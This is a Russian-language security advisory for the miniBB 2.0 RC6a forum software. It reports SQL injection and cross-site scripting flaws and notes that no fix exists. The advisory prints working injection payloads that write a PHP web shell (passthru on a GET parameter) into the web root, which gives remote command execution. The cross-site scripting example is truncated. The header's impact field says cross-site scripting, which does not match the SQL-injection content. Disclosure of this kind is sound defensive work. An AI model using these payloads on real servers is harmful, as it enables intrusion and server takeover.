| Дата публикации: | 02.05.2006 |
| Дата изменения: | 06.04.2009 |
| Всего просмотров: | 3675 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Межсайтовый скриптинг |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | miniBB 2.x |
| Уязвимые версии: miniBB 2.0 RC6a, возможно более ранние версии.
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах confirmCode и post в сценарии index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:
/index.php?action=confirmpasswd&confirmCode=f' union select ' passthru($_GET[cmd])
?>' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/* 2. Уязвимость существует из-за недостаточной обработки входных данных в параметрах “user_usr”, “email” и “login”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
user_usr=f' union select ' passthru($_GET[cmd]) ?>','123' from mysql.user
INTO OUTFILE '/var/www/html/shell.php'/* 3.Уязвимость существует из-за недостаточной обработки входных данных в параметре “queryStr”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
POST /index.php?sortBy=1 HTTP/1.0 Уязвимости #1 и #2 обнаружил KeVRter (KeVRter@netw.ru) URL производителя: www.minibb.net Решение: Способов устранения уязвимости не существует в настоящее время. |